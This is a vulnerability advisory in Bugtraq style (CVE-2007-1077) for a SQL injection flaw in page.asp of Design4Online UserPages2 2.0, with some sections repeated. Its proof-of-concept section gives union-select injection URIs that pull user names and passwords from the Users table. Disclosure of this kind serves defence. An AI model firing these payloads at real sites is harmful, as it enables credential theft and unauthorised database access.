Design4Online Userpages2 Page.ASP SQL Injection Vulnerability
BID:22636
Info
Design4Online Userpages2 Page.ASP SQL Injection Vulnerability
| Bugtraq ID: | 22636 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-1077 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 20 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | xoron is credited with the discovery of this vulnerability. |
| Vulnerable: |
Design4Online UserPages2 2.0 |
| Not Vulnerable: | |
Discussion
Design4Online Userpages2 Page.ASP SQL Injection Vulnerability
Userpages2 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Version 2.0 is vulnerable; other versions may also be affected.
Userpages2 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Version 2.0 is vulnerable; other versions may also be affected.
Exploit / POC
Design4Online Userpages2 Page.ASP SQL Injection Vulnerability
An attacker can exploit this issue via a web client.
The following example URIs are available:
http://www.example.com/page.asp?art_id=[SQL]
http://www.example.com/page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1
http://www.example.com/page.asp?art_id=-1+union+select+0,PassWord,2,3,4,5,6,7,8,9+from+Users+where+id=1
An attacker can exploit this issue via a web client.
The following example URIs are available:
http://www.example.com/page.asp?art_id=[SQL]
http://www.example.com/page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1
http://www.example.com/page.asp?art_id=-1+union+select+0,PassWord,2,3,4,5,6,7,8,9+from+Users+where+id=1
Solution / Fix
Design4Online Userpages2 Page.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Design4Online Userpages2 Page.ASP SQL Injection Vulnerability
References:
References:
- Userpages2 Homepage (Design4Online)